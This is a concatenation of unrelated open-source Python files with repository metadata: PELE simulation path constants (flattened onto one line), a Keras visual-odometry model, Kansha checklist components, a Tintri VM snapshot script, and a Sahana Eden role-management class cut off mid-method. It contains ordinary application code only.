from __future__ import absolute_import, division, print_function, unicode_literals import os import socket machine = socket.getfqdn() print("MACHINE", machine) if "bsccv" in machine: PELE_EXECUTABLE = "/data/EAPM/PELE/PELE++/bin/rev12360/Pele_rev12360_mpi" DATA_FOLDER = "/data/EAPM/PELE/PELE++/data/rev12360/Data" DOCUMENTS_FOLDER = "/data/EAPM/PELE/PELE++/Documents/rev12360" PYTHON = "/data2/apps/PYTHON/2.7.5/bin/python2.7" elif "mn.bsc" in machine: PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/V1.6/build/PELE-1.6_mpi" DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Data" DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Documents" PYTHON = "python" elif "bsc.mn" in machine: PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/build/PELE-1.6_mpi" DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Data" DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Documents" elif "bullx" in machine: # this values are not correct for the minoTauro hardware, just leaving it # here as a placeholder PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/rev090518/bin/PELE-1.5_mpi" DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Data" DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Documents" elif machine == "bscls309": PELE_EXECUTABLE = "/home/jgilaber/PELE-repo/bin/PELE-1.6_mpi" DATA_FOLDER = "/home/jgilaber/PELE-repo/Data" DOCUMENTS_FOLDER = "/home/jgilaber/PELE-repo/Documents" else: PELE_EXECUTABLE = None DATA_FOLDER = None DOCUMENTS_FOLDER = None inputFileTemplate = "{ \"files\" : [ { \"path\" : \"%s\" } ] }" trajectoryBasename = "*traj*" class AmberTemplates: forcefields = {"ff99SB": "oldff/leaprc.ff99SB", "ff14SB": "leaprc.protein.ff14SB"} antechamberTemplate = "antechamber -i $LIGAND -fi pdb -o $OUTPUT -fo mol2 -c bcc -pf y -nc $CHARGE" parmchk2Template = "parmchk2 -i $MOL2 -f mol2 -o $OUTPUT" tleapTemplate = "source $FORCEFIELD\n" \ "source leaprc.gaff\n" \ "source leaprc.water.tip3p\n" \ "$MODIFIED_RES " \ "$LIGANDS " \ "$DUM " \ "$COFACTORS " \ "COMPLX = loadpdb $COMPLEX\n" \ "$BONDS " \ "addions COMPLX Cl- 0\n" \ "addions COMPLX Na+ 0\n" \ "solvatebox COMPLX TIP3PBOX $BOXSIZE\n" \ "saveamberparm COMPLX $PRMTOP $INPCRD\n" \ "savepdb COMPLX $SOLVATED_PDB\n" \ "quit" DUM_atom = "DUM" DUM_res = "DUM" DUM_prep = " 0 0 0\n" \ "\n" \ "------%s--------------\n" \ "%s\n" \ "%s INT 0\n" \ "CHANGE OMIT DU BEG\n" \ " 0.0\n" \ " 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \ " 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \ " 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \ " 4 %s C E 0.00 0.00 0.00 0.00\n" \ "\n" \ "\n" \ "DONE\n" \ "STOP\n" \ "\n" % (DUM_res, DUM_res, DUM_res, DUM_atom) DUM_cyl_prep = " 0 0 0\n" \ "\n" \ "------%s--------------\n" \ "%s\n" \ "%s INT 0\n" \ "CHANGE OMIT DU BEG\n" \ " 0.0\n" \ " 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \ " 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \ " 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \ " 4 %s C E 0.00 0.00 0.00 0.00\n" \ " 5 %s C E 0.00 0.00 0.00 0.00\n" \ " 6 %s C E 0.00 0.00 0.00 0.00\n" \ "\n" \ "\n" \ "DONE\n" \ "STOP\n" \ "\n" % (DUM_res, DUM_res, DUM_res, DUM_atom, DUM_atom+"B", DUM_atom+"T") DUM_frcmod = "invented MM atom\n" \ "MASS\n" \ "%s 0.00 0.00\n" \ "\n" \ "NONB\n" \ " %s 0.00 0.00\n" % (DUM_atom, DUM_atom) DUM_cyl_frcmod = "invented MM atom\n" \ "MASS\n" \ "%s 0.00 0.00\n" \ "%s 0.00 0.00\n" \ "%s 0.00 0.00\n" \ "\n" \ "NONB\n" \ " %s 0.00 0.00\n" \ " %s 0.00 0.00\n" \ " %s 0.00 0.00\n" % (DUM_atom, DUM_atom+"B", DUM_atom+"T", DUM_atom, DUM_atom+"B", 
DUM_atom+"T") trajectoryTemplate = "trajectory_%d.%s" CheckPointReporterTemplate = "checkpoint_%d.chk" class OutputPathConstants(): """ Class with constants that depend on the outputPath """ def __init__(self, outputPath): self.originalControlFile = "" self.epochOutputPathTempletized = "" self.clusteringOutputDir = "" self.clusteringOutputObject = "" self.equilibrationDir = "" self.tmpInitialStructuresTemplate = "" self.tmpControlFilename = "" self.tmpInitialStructuresEquilibrationTemplate = "" self.tmpControlFilenameEqulibration = "" self.topologies = "" self.allTrajsPath = "" self.MSMObjectEpoch = "" self.buildConstants(outputPath) def buildConstants(self, outputPath): self.buildOutputPathConstants(outputPath) self.tmpFolder = "tmp_" + outputPath.replace("/", "_") self.buildTmpFolderConstants(self.tmpFolder) def buildOutputPathConstants(self, outputPath): self.originalControlFile = os.path.join(outputPath, "originalControlFile.conf") self.epochOutputPathTempletized = os.path.join(outputPath, "%d") self.clusteringOutputDir = os.path.join(self.epochOutputPathTempletized, "clustering") self.clusteringOutputObject = os.path.join(self.clusteringOutputDir, "object.pkl") self.MSMObjectEpoch = os.path.join(self.epochOutputPathTempletized, "MSM_object.pkl") self.topologies = os.path.join(outputPath, "topologies") self.equilibrationDir = os.path.join(outputPath, "equilibration") self.allTrajsPath = os.path.join(outputPath, "allTrajs") def buildTmpFolderConstants(self, tmpFolder): self.tmpInitialStructuresTemplate = tmpFolder+"/initial_%d_%d.pdb" self.tmpInitialStructuresEquilibrationTemplate = tmpFolder+"/initial_equilibration_%d.pdb" self.tmpControlFilename = tmpFolder+"/controlFile%d.conf" self.tmpControlFilenameEqulibration = tmpFolder+"/controlFile_equilibration_%d.conf" md_supported_formats = set(["xtc", "dcd"]) formats_md_string = ", ".join(md_supported_formats)
mit
-6,549,988,297,967,724,000
42.05988
129
0.522459
false
2.998749
false
false
false
ksu-mechatronics-research/deep-visual-odometry
models/hand_crafted/alexnet_inspired/alexNet_14q/alexnet14.py
1
2703
# The Model of DeepVO from keras.layers import Input from keras.layers.core import Dense, Dropout, Activation, Flatten, Lambda from keras.layers.convolutional import Convolution2D, MaxPooling2D from keras.layers.normalization import BatchNormalization from keras.models import Model from keras.layers.advanced_activations import PReLU from keras import backend as K #enable tensorflow functions #AlexNet with batch normalization in Keras #input image is 128x128 def create_model(): """ This model is designed to take in images and give multiple outputs. Here is what the network was designed for: Inputs: 128x128x6 RGB images stacked (RGBRGB) Outputs: Translation between two images Rotation between images in quaternion form """ input_img = Input(shape=(128, 128, 6), name='input_img') x = Convolution2D(96, 11, 11, border_mode='same')(input_img) x = BatchNormalization()(x) x = Activation('relu')(x) x = MaxPooling2D(pool_size=(11, 11), strides=(5, 5), border_mode='same')(x) x = Convolution2D(384, 3, 3, border_mode='same')(x) x = BatchNormalization()(x) x = Activation('relu')(x) x = MaxPooling2D(pool_size=(3, 3), strides=(3, 3), border_mode='same')(x) x = Flatten()(x) x = Dense(4096, init='normal')(x) x = BatchNormalization()(x) x = Activation('relu')(x) x = Dense(4096, init='normal')(x) x = BatchNormalization()(x) x = Activation('relu')(x) # Delta Translation output translation_proc = Dense(3, init='normal')(x) vector_translation = PReLU(name='translation')(translation_proc) # Delta rotation in quaternion form rotation_proc = Dense(64, activation='relu')(x) rotation_proc = Dense(64, activation='relu')(rotation_proc) rotation_proc = Dense(64, activation='relu')(rotation_proc) rotation_proc = Dense(4, activation='tanh')(rotation_proc) quaternion_rotation = Lambda(normalize_quaternion, name='rotation')(rotation_proc) model = Model(input=input_img, output=[vector_translation, quaternion_rotation]) return model def normalize_quaternion(x): "Use tensorflow normalize function on this layer to ensure valid quaternion rotation" x = K.l2_normalize(x, axis=1) return x def train_model(model, Xtr, Ytr, Xte, Yte, save_path=None): "Note: y should be [[translation],[quat rotation]]" model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_absolute_error']) history = model.fit(Xtr, Ytr, validation_split=0.2, batch_size=8, nb_epoch=30, verbose=1) score = model.evaluate(Xte, Yte, verbose=1) if save_path: model.save(save_path) return score, history
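# Editor's sketch (not part of the original file): wiring the helpers above
# together. Shapes follow the docstring (128x128x6 stacked image pairs); the
# arrays are random placeholders, not real visual-odometry data. Note that
# create_model() applies PReLU directly as a layer, since Activation() only
# accepts activation names or plain functions.
def _example_train():
    import numpy as np
    model = create_model()
    Xtr = np.random.rand(32, 128, 128, 6)
    Ytr = [np.random.rand(32, 3), np.random.rand(32, 4)]  # [translations, quaternions]
    Xte = np.random.rand(8, 128, 128, 6)
    Yte = [np.random.rand(8, 3), np.random.rand(8, 4)]
    return train_model(model, Xtr, Ytr, Xte, Yte)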
mit
-4,285,629,334,953,081,000
32.37037
95
0.691454
false
3.580132
false
false
false
droodle/kansha
kansha/checklist/comp.py
1
5840
# -- # Copyright (c) 2012-2014 Net-ng. # All rights reserved. # # This software is licensed under the BSD License, as described in # the file LICENSE.txt, which you should have received as part of # this distribution. # -- from nagare import component, database, security import json from kansha.title import comp as title from kansha import notifications from models import DataChecklist, DataChecklistItem class NewChecklistItem(object): def __init__(self): self.focus = False class ChecklistTitle(title.Title): model = DataChecklist field_type = 'input' class ChecklistItemTitle(title.Title): model = DataChecklistItem field_type = 'input' class ChecklistItem(object): def __init__(self, id_, data=None): self.id = id_ data = data if data is not None else self.data self.title = component.Component(ChecklistItemTitle(self)) self.title.on_answer(lambda v: self.title.call(model='edit' if not self.title.model else None)) self.done = data.done @property def data(self): return DataChecklistItem.get(self.id) def get_title(self): return self.data.title def set_title(self, title): self.data.title = title def set_done(self): '''toggle done status''' self.data.done = self.done = not self.done item = self.data data = {'item': self.get_title(), 'list': item.checklist.title, 'card': item.checklist.card.title} notifications.add_history(item.checklist.card.column.board, item.checklist.card, security.get_user().data, u'card_listitem_done' if self.done else u'card_listitem_undone', data) class Checklist(object): def __init__(self, id_, data=None): self.id = id_ data = data if data is not None else self.data self.items = [component.Component(ChecklistItem(item.id, item)) for item in data.items] self.title = component.Component(ChecklistTitle(self)) self.title.on_answer(self.handle_answer) self.new_item = component.Component(NewChecklistItem()) self.new_item.on_answer(self.add_item) def handle_answer(self, v): if v and self.title.model: self.new_title(v) self.title.call(model='edit' if not self.title.model else None) def edit_title(self): self.title.becomes(model='edit') def reorder_items(self): for i, item in enumerate(self.data.items): item.index = i def add_item(self, text): if text is None or not text.strip(): return item = DataChecklistItem(checklist=self.data, title=text.strip(), index=len(self.data.items)) database.session.flush() item = component.Component(ChecklistItem(item.id, item)) self.items.append(item) self.reorder_items() self.new_item().focus = True def delete_item(self, index): item = self.items.pop(index)() item.data.delete() self.reorder_items() def get_title(self): return self.data.title def set_title(self, title): self.data.title = title def set_index(self, index): self.data.index = index @property def total_items(self): return len(self.items) @property def nb_items(self): return len([item for item in self.items if item().done]) @property def progress(self): if not self.items: return 0 return self.nb_items * 100 / self.total_items @property def data(self): return DataChecklist.get(self.id) def new_title(self, title): cl = self.data data = {'list': title, 'card': cl.card.title} notifications.add_history(cl.card.column.board, cl.card, security.get_user().data, u'card_add_list', data) class Checklists(object): def __init__(self, card): self.parent = card self.checklists = [component.Component(Checklist(clist.id, clist)) for clist in card.data.checklists] @property def nb_items(self): return sum([cl().nb_items for cl in self.checklists]) @property def total_items(self): return sum([cl().total_items 
for cl in self.checklists]) def delete_checklist(self, index): cl = self.checklists.pop(index)() for i in range(index, len(self.checklists)): self.checklists[i]().set_index(i) data = {'list': cl.get_title(), 'card': self.parent.get_title()} cl.data.delete() if data['list']: notifications.add_history(self.parent.column.board.data, self.parent.data, security.get_user().data, u'card_delete_list', data) def add_checklist(self): clist = DataChecklist(card=self.parent.data) database.session.flush() ck = Checklist(clist.id, clist) ck.edit_title() ck.set_index(len(self.checklists)) self.checklists.append(component.Component(ck)) def reorder(self, ids): """Reorder checklists In: - ``ids`` -- checklist ids """ new_order = [] i = 0 for cl_id in json.loads(ids): id_ = int(cl_id.split('_')[-1]) for cl in self.checklists: if cl().id == id_: cl().set_index(i) i += 1 new_order.append(cl) self.checklists = new_order
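# Editor's sketch (not part of the original file): the expected call sequence
# inside a nagare request, where `card` is a kansha card component whose .data
# row the classes above read and write; the item title is illustrative.
def _example_checklist_flow(card):
    checklists = Checklists(card)
    checklists.add_checklist()                # creates an empty DataChecklist
    checklist = checklists.checklists[-1]()
    checklist.add_item(u"Write unit tests")   # appends the item and reindexes
    checklist.items[0]().set_done()           # toggles done and records history
    return checklist.progress                 # percentage of completed items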
bsd-3-clause
-5,212,961,767,522,489,000
29.103093
109
0.568151
false
3.880399
false
false
false
Tintri/tintri-api-examples
snapshot_vm.py
1
5628
#!/usr/bin/python # -*- coding: utf-8 -*- # # The MIT License (MIT) # # Copyright (c) 2016 Tintri, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import sys import json import datetime import tintri_1_1 as tintri """ This Python script takes a snapshot for the specified VM. """ # For exhaustive messages on console, set it to True; otherwise keep it False debug_mode = False def print_with_prefix(prefix, out): print(prefix + out) return def print_debug(out): if debug_mode: print_with_prefix("[DEBUG] : ", out) return def print_info(out): print_with_prefix("[INFO] : ", out) return def print_error(out): print_with_prefix("[ERROR] : ", out) return # Take a manual snapshot. def take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id): snapshot_spec = { 'typeId' : "com.tintri.api.rest.v310.dto.domain.beans.snapshot.SnapshotSpec", 'consistency' : consistency_type, 'retentionMinutes' : 240, # 4 hours 'snapshotName' : snapshot_name, 'sourceVmTintriUUID' : vm_uuid } # The API needs a list of snapshot specifications. snapshot_specs = [snapshot_spec] ss_url = "/v310/snapshot" r = tintri.api_post(server_name, ss_url, snapshot_specs, session_id) if (r.status_code != 200): msg = "The HTTP response for the post invoke to the server " + server_name + " is not 200, but is: " + str(r.status_code) + "." raise tintri.TintriApiException(msg, r.status_code, ss_url, str(snapshot_specs), r.text) print_debug("The JSON response of the post invoke to the server " + server_name + " is: " + r.text) # The result is a list of snapshot UUIDs. snapshot_result = r.json() print_info(snapshot_name + ": " + snapshot_result[0]) return # main if len(sys.argv) < 5: print("\nSnapshot a VM.\n") print("Usage: " + sys.argv[0] + " server_name user_name password vm_name [consistency type]\n") print(" consistency type can be 'crash' or 'vm'. The default is 'crash'.") sys.exit(-1) server_name = sys.argv[1] user_name = sys.argv[2] password = sys.argv[3] vm_name = sys.argv[4] if (len(sys.argv) == 6): consistency_type = sys.argv[5] else: consistency_type = "crash" try: # Confirm the consistency type. 
if (consistency_type == "crash"): consistency_type = "CRASH_CONSISTENT" elif (consistency_type == "vm"): consistency_type = "VM_CONSISTENT" else: raise tintri.TintriRequestException("consistency_type is not 'crash' or 'vm': " + consistency_type) # Get the preferred version r = tintri.api_version(server_name) json_info = r.json() print_info("API Version: " + json_info['preferredVersion']) # Login to VMstore or TGC session_id = tintri.api_login(server_name, user_name, password) except tintri.TintriRequestsException as tre: print_error(tre.__str__()) sys.exit(-10) except tintri.TintriApiException as tae: print_error(tae.__str__()) sys.exit(-11) try: # Create query filter to get the VM specified by the VM name. q_filter = {'name': vm_name} # Get the UUID of the specified VM vm_url = "/v310/vm" r = tintri.api_get_query(server_name, vm_url, q_filter, session_id) print_debug("The JSON response of the get invoke to the server " + server_name + " is: " + r.text) vm_paginated_result = r.json() num_vms = int(vm_paginated_result["filteredTotal"]) if num_vms == 0: raise tintri.TintriRequestsException("VM " + vm_name + " doesn't exist") # Get the information from the first item and hopefully the only item. items = vm_paginated_result["items"] vm = items[0] vm_name = vm["vmware"]["name"] vm_uuid = vm["uuid"]["uuid"] print_info(vm_name + ": " + vm_uuid) # Get the time for the snapshot description. now = datetime.datetime.now() now_sec = datetime.datetime(now.year, now.month, now.day, now.hour, now.minute, now.second) snapshot_name = vm_name + now_sec.isoformat() # Take a manual snapshot. take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id) # All pau, log out. tintri.api_logout(server_name, session_id) except tintri.TintriRequestsException as tre: print_error(tre.__str__()) tintri.api_logout(server_name, session_id) sys.exit(-20) except tintri.TintriApiException as tae: print_error(tae.__str__()) tintri.api_logout(server_name, session_id) sys.exit(-21)
mit
-2,311,016,554,236,844,000
31.344828
107
0.663468
false
3.450644
false
false
false
flavour/eden
modules/s3/s3roles.py
1
73907
# -*- coding: utf-8 -*- """ S3 User Roles Management @copyright: 2018-2019 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ("S3RoleManager", ) import uuid import json #import sys from gluon import current, URL, DIV, SPAN, SQLFORM, INPUT, A, LI, UL from s3compat import StringIO, long from s3dal import Field from .s3crud import S3CRUD from .s3rest import S3Method from .s3query import FS from .s3utils import s3_str, s3_mark_required from .s3validators import JSONERRORS from .s3widgets import s3_comments_widget from .s3xml import SEPARATORS # ============================================================================= class S3RoleManager(S3Method): """ REST Method to manage user roles and permission rules """ # ------------------------------------------------------------------------- def apply_method(self, r, **attr): """ Entry point for REST interface. 
@param r: the S3Request instance @param attr: controller attributes """ method = self.method tablename = self.tablename auth = current.auth sr = auth.get_system_roles() output = {} if tablename == "auth_group": # through admin/role controller # Only ADMIN can manipulate roles if not auth.s3_has_role(sr.ADMIN): r.unauthorised() if method == "list": output = self.role_list(r, **attr) elif method in ("read", "create", "update"): output = self.role_form(r, **attr) elif method == "copy": output = self.copy_role(r, **attr) elif method == "delete": output = self.delete_role(r, **attr) elif method == "users": output = self.assign_users(r, **attr) elif method == "import": output = self.import_roles(r, **attr) else: r.error(405, current.ERROR.BAD_METHOD) elif tablename == "auth_user": # through admin/user controller # Must have read-permission for the user record # (user accounts are filtered to OU by controller) if not self._permitted(): r.unauthorised() if method == "roles": output = self.assign_roles(r, **attr) else: r.error(405, current.ERROR.BAD_METHOD) # TODO implement per-target perspective #elif tablename == "s3_permission": # through admin/permissions controller # # # View permissions for a target (page or table) # r.error(501, current.ERROR.NOT_IMPLEMENTED) else: r.error(401, current.ERROR.BAD_REQUEST) return output # ------------------------------------------------------------------------- def role_list(self, r, **attr): """ List or export roles @param r: the S3Request instance @param attr: controller attributes NB this function must be restricted to ADMINs (in apply_method) """ # Check permission to read in this table authorised = self._permitted() if not authorised: r.unauthorised() # Validate requested format representation = r.representation if representation == "csv": return self.export_roles(r, **attr) T = current.T response = current.response s3 = response.s3 get_vars = self.request.get_vars # List Config list_id = "roles" list_fields = ["id", "role", (T("UID"), "uuid"), "description", ] default_orderby = "auth_group.role" s3.no_formats = True # Exclude hidden roles resource = self.resource resource.add_filter(FS("hidden") == False) if r.interactive: # Formkey for Ajax-actions formkey = str(uuid.uuid4()) current.session["_formkey[admin/rolelist]"] = formkey # Pagination display_length = s3.dataTable_pageLength or 25 start = None if s3.no_sspag: dt_pagination = "false" limit = None else: dt_pagination = "true" limit = 2 * display_length # Generate Data Table dt, totalrows = resource.datatable(fields = list_fields, start = start, limit = limit, left = [], orderby = default_orderby, ) # Render the Data Table datatable = dt.html(totalrows, totalrows, id = list_id, dt_pagination = dt_pagination, dt_pageLength = display_length, dt_base_url = r.url(method="", vars={}), dt_permalink = r.url(), dt_formkey = formkey, ) # Configure action buttons self.role_list_actions(r) # View response.view = "admin/roles.html" # Page actions crud_button = S3CRUD.crud_button page_actions = DIV(crud_button(T("Create Role"), _href = r.url(method="create"), ), # TODO activate when implemented #crud_button(T("Import Roles"), # _href = r.url(method="import"), # ), crud_button(T("Export Roles"), _href = r.url(representation="csv"), ), ) # Output output = {"title": T("User Roles"), "items": datatable, "page_actions": page_actions, } elif representation == "aadata": # Page limits start, limit = S3CRUD._limits(get_vars) # Data Table Filter and Sorting searchq, orderby, left = resource.datatable_filter(list_fields, 
get_vars, ) if searchq is not None: totalrows = resource.count() resource.add_filter(searchq) else: totalrows = None if orderby is None: orderby = default_orderby # Data Table if totalrows != 0: dt, displayrows = resource.datatable(fields = list_fields, start = start, limit = limit, left = left, orderby = orderby, ) else: dt, displayrows = None, 0 if totalrows is None: totalrows = displayrows # Echo draw = int(get_vars.get("draw", 0)) # Representation if dt is not None: output = dt.json(totalrows, displayrows, list_id, draw) else: output = '{"recordsTotal":%s,' \ '"recordsFiltered":0,' \ '"dataTable_id":"%s",' \ '"draw":%s,' \ '"data":[]}' % (totalrows, list_id, draw) else: r.error(415, current.ERROR.BAD_FORMAT) return output # ------------------------------------------------------------------------- def role_list_actions(self, r): """ Configure action buttons for role list @param r: the S3Request """ T = current.T s3 = current.response.s3 sr = current.auth.get_system_roles() table = self.table # Standard actions s3.actions = None s3.crud_labels.UPDATE = T("Edit") S3CRUD.action_buttons(r, editable=True, deletable=False) action_button = S3CRUD.action_button # Users label = T("Users") excluded = [str(sr.AUTHENTICATED), str(sr.ANONYMOUS)] action_button(label, URL(args=["[id]", "users"]), exclude = excluded, _title = s3_str(T("Assign this role to users")), ) action_button(label, None, restrict = excluded, _disabled = "disabled", _title = s3_str(T("This role is assigned automatically")), ) # Copy-button Ajax label = T("Copy") excluded = [str(sr.ADMIN)] action_button(label, None, _ajaxurl = URL(args=["[id]", "copy.json"]), exclude = excluded, _title = s3_str(T("Copy this role to create a new role")), _class = "action-btn copy-role-btn", ) action_button(label, None, restrict = excluded, _disabled = "disabled", _title = s3_str(T("This role cannot be copied")), ) question = T("Create a copy of this role?") script = '''var dt=$('#roles');dt.on('click','.copy-role-btn',dt.dataTableS3('ajaxAction','%s'));''' % question s3.jquery_ready.append(script) # Delete-button Ajax label = T("Delete") query = (table.deleted == False) & \ ((table.system == True) | (table.protected == True)) protected_roles = current.db(query).select(table.id) excluded = [str(role.id) for role in protected_roles] action_button(label, None, _ajaxurl = URL(args=["[id]", "delete.json"]), _class = "delete-btn-ajax action-btn dt-ajax-delete", exclude = excluded, ) action_button(label, None, restrict = excluded, _disabled = "disabled", _title = s3_str(T("This role cannot be deleted")), ) # ------------------------------------------------------------------------- def role_form(self, r, **attr): """ Create, read, update a role NB this function must be restricted to ADMINs (in apply_method) """ T = current.T s3 = current.response.s3 settings = current.deployment_settings output = {} method = r.method record = r.record # Read-only? 
readonly = False if r.record: if r.interactive: readonly = method == "read" elif r.representation == "csv": return self.export_roles(r, **attr) else: r.error(415, current.ERROR.BAD_FORMAT) # Form fields table = r.table # UID uid = table.uuid uid.label = T("UID") uid.readable = True uid.writable = False if record and record.system else True # Role name role = table.role role.label = T("Name") # Role description description = table.description description.label = T("Description") description.widget = s3_comments_widget # Permissions PERMISSIONS = T("Permissions") permissions = Field("permissions", label = PERMISSIONS, widget = S3PermissionWidget(r.id), ) if record and record.uuid == "ADMIN": # Administrator permissions cannot be edited permissions.readable = permissions.writable = False elif not current.auth.permission.use_cacls: # Security policy does not use configurable permissions if record: record.permissions = None permissions.widget = self.policy_hint elif readonly: # Read-only view (dummy) - just hide permissions permissions.readable = permissions.writable = False elif record: # Populate the field with current permissions record.permissions = self.get_permissions(record) # Mark required if not readonly: labels, s3.has_required = s3_mark_required(table, []) labels["permissions"] = "%s:" % s3_str(PERMISSIONS) else: labels = None # Form buttons if not readonly: submit_button = INPUT(_class = "small primary button", _type = "submit", _value = T("Save"), ) cancel_button = A(T("Cancel"), _class="cancel-form-btn action-lnk", _href = r.url(id=""), ) buttons = [submit_button, cancel_button] else: buttons = ["submit"] # Form style crudopts = s3.crud formstyle = crudopts.formstyle_read if readonly else crudopts.formstyle # Render form tablename = "auth_group" form = SQLFORM.factory(uid, role, description, permissions, record = record, showid = False, labels = labels, formstyle = formstyle, table_name = tablename, upload = s3.download_url, readonly = readonly, separator = "", submit_button = settings.submit_button, buttons = buttons, ) form.add_class("rm-form") output["form"] = form # Navigate-away confirmation if crudopts.navigate_away_confirm: s3.jquery_ready.append("S3EnableNavigateAwayConfirm()") # Process form response = current.response formname = "%s/%s" % (tablename, record.id if record else None) if form.accepts(current.request.post_vars, current.session, #onvalidation = self.validate, formname = formname, keepvalues = False, hideerror = False, ): role_id, message = self.update_role(record, form) if role_id: response.confirmation = message self.next = r.url(id="", method="") else: response.error = message elif form.errors: response.error = T("There are errors in the form, please check your input") # Title if record: if readonly: output["title"] = record.role else: output["title"] = T("Edit Role: %(role)s") % {"role": record.role} else: output["title"] = T("Create Role") # View response.view = "admin/role_form.html" return output # ------------------------------------------------------------------------- @staticmethod def policy_hint(field, value, **attr): """ Show a hint if permissions cannot be edited due to security policy @param field: the Field instance @param value: the current field value (ignored) @param attr: DOM attributes for the widget (ignored) """ T = current.T warn = T("The current system configuration uses hard-coded access rules (security policy %(policy)s).") % \ {"policy": current.deployment_settings.get_security_policy()} hint = T("Change to security policy 3 or 
higher if you want to define permissions for roles.") return DIV(SPAN(warn, _class="rm-fixed"), SPAN(hint, _class="rm-hint"), INPUT(_type = "hidden", _name = field.name, _value= "", ), ) # ------------------------------------------------------------------------- @staticmethod def get_permissions(role): """ Extract the permission rules for a role @param role: the role (Row) @returns: the permission rules as JSON string """ permissions = current.auth.permission rules = [] table = permissions.table if table: query = (table.group_id == role.id) & \ (table.deleted == False) if not permissions.use_facls: query &= (table.function == None) if not permissions.use_tacls: query &= (table.tablename == None) rows = current.db(query).select(table.id, table.controller, table.function, table.tablename, table.uacl, table.oacl, table.entity, table.unrestricted, ) for row in rows: if row.unrestricted: entity = "any" else: entity = row.entity rules.append([row.id, row.controller, row.function, row.tablename, row.uacl, row.oacl, entity, False, # delete-flag ]) return json.dumps(rules, separators=SEPARATORS) # ------------------------------------------------------------------------- def update_role(self, role, form): """ Create or update a role from a role form @param role: the role (Row) @param form: the form @returns: tuple (role ID, confirmation message) """ T = current.T auth = current.auth formvars = form.vars rolename = formvars.role uid = formvars.uuid if role: role_id = role.id data = {"role": rolename, "description": formvars.description, } if uid is not None: data["uuid"] = uid role.update_record(**data) else: data = {"role": rolename} role_id = auth.s3_create_role(rolename, description = formvars.description, uid = uid, ) if role_id: # Update permissions permissions = formvars.permissions if permissions: self.update_permissions(role_id, permissions) if not role: message = T("Role %(role)s created") % data else: message = T("Role %(role)s updated") % data else: if not role: message = T("Failed to create role %(role)s") % data else: message = T("Failed to update role %(role)s") % data return role_id, message # ------------------------------------------------------------------------- @staticmethod def update_permissions(role_id, rules): """ Update the permission rules for a role @param role_id: the role record ID (auth_group.id) @param rules: the rules as JSON string """ table = current.auth.permission.table if table: db = current.db rules = json.loads(rules) for rule in rules: rule_id = rule[0] deleted = rule[7] if rule_id is None: continue if not any(rule[i] for i in (1, 2, 3)): continue if rule_id and deleted: db(table.id == rule_id).update(deleted=True) else: entity = rule[6] if entity == "any": unrestricted = True entity = None else: unrestricted = False try: entity = long(entity) if entity else None except (ValueError, TypeError): entity = None data = {"group_id": role_id, "controller": rule[1], "function": rule[2], "tablename": rule[3], "uacl": rule[4], "oacl": rule[5], "entity": entity, "unrestricted": unrestricted, } if rule_id: # Update the rule db(table.id == rule_id).update(**data) else: # Add the rule table.insert(**data) # ------------------------------------------------------------------------- @staticmethod def copy_role(r, **attr): """ Duplicate an existing role NB this function must be restricted to ADMINs (in apply_method) """ # CSRF Protection key = current.session["_formkey[admin/rolelist]"] if not key or r.post_vars.get("_formkey") != key: r.error(403, current.ERROR.NOT_PERMITTED) 
